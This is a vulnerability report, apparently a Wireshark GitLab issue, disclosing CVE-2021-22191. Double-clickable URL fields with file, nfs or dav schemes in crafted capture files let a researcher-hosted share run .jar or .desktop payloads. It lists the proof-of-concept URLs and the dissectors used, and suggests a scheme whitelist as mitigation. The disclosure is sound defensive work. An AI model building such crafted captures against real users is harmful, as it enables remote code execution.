Headline
CVE-2021-22191: Code execution in Wireshark via non-http(s) schemes in URL fields (#17232) · Issues · Wireshark Foundation / wireshark · GitLab
Improper URL handling in Wireshark 3.4.0 to 3.4.3 and 3.2.0 to 3.2.11 could allow remote code execution via via packet injection or crafted capture file.
This issue was reported to [email protected] on 2021-01-19 but has not been acknowledged so far. The Xubuntu NFS variant was discovered after the original report and has been added here.
Description
Some fields in the Wireshark proto_tree are double-clickable and pass URLs with arbitrary schemes to the QDesktopServices::openUrl function. http and https URLs passed to this function are opened by the browser which is generally safe. For some other schemes like dav and file however, referenced files will be opened by the system’s standard application associated with their file type. By preparing internet-hosted file shares and executable files, arbitrary code execution can be achieved via malicious pcap(ng) files or captured live-traffic and some user interaction. Depending on which system and scheme/remote protocols are used, slightly different behaviors can be observed. Attached are two PoC videos:
1 - Windows: PoC_1_Windows
- Packet/disector: DHCP option 114 (Captive Portal)
- Malicious URL: file:////posisec.com/DavWWWRoot/jartest.jar
- File executed: jartest.jar - pops up a swing dialog box
- System: Fresh Windows 10 install with Wireshark 3.4.2 and standard JRE installation
- Backend: Anonymous WebDav share hosted at dav://posisec.com/ (src-IP restricted)
- Behavior: The user opens the malicious pcap file and double-clicks the file URL. The WebDav share is mounted in the background, and the .jar file is executed.
2.1 - Xubuntu NFS: PoC_2_1_Xubuntu
- Packet/disector: X509 Certificate authority info
- Malicious URL: nfs://posisec.com/export/malicious_cmnd.desktop
- File executed: malicious_cmnd.desktop - pops up an xmessage dialog
- System: Fresh Xubuntu install with Wireshark 3.2.3
- Backend: Anonymous NFS share hosted at nfs://posisec.com/ (src-IP restricted)
- Behavior: The user opens the malicious pcapng file and double-clicks the nfs URL. The NFS share is mounted in the background, and the .desktop file is executed.
2.2 - Xubuntu Webdav: PoC_2_Xubuntu
- Packet/disector: X509 Certificate authority info
- Malicious URL 1: dav://posisec.com/
- Malicious URL 2: file:///run/user/1000/gvfs/dav:host=posisec.com,ssl=false/cmdx.desktop
- File executed: cmdx.desktop - pops up an xmessage dialog
- System: Fresh Xubuntu install with Wireshark 3.2.3
- Backend: Anonymous WebDav share hosted at dav://posisec.com/ (src-IP restricted)
- Behavior: The user first double-clicks malicious URL 1 which mounts the Anonymous WebDav share and opens up the file explorer. When the user double-clicks malicious URL 2, the foreign .desktop file is executed without an OS warning since the now mounted share is referenced via a local file path.
Note that there are more schemes (sftp, davs, smb, …) and payloads (.exe, .bat, …) that can be used to achieve slightly different behaviors. Also note that some ISPs or Access Point devices may block outgoing SMB traffic, preventing exploitation via internet-hosted SMB shares.
Risk
An attacker could distribute malicious capture files and entice people to inspect them. On Windows with JRE installed, a simple doubleclick on a crafted field is enough to cause code execution on the victim’s system.
Mitigation suggestion
Add sanitization logic in ProtoTree::itemDoubleClicked to only allow whitelisted URL schemes (http, https).
Edited Feb 12, 2021 by
Related news
Vulnerability in the Java SE, Java SE Embedded, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u291, 8u281, 11.0.10, 16; Java SE Embedded: 8u281; Oracle GraalVM Enterprise Edition: 19.3.5, 20.3.1.2 and 21.0.0.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Java SE, Java SE Embedded, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 5.3 (Integrity impacts). CV...
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DML). Supported versions that are affected are 5.7.33 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).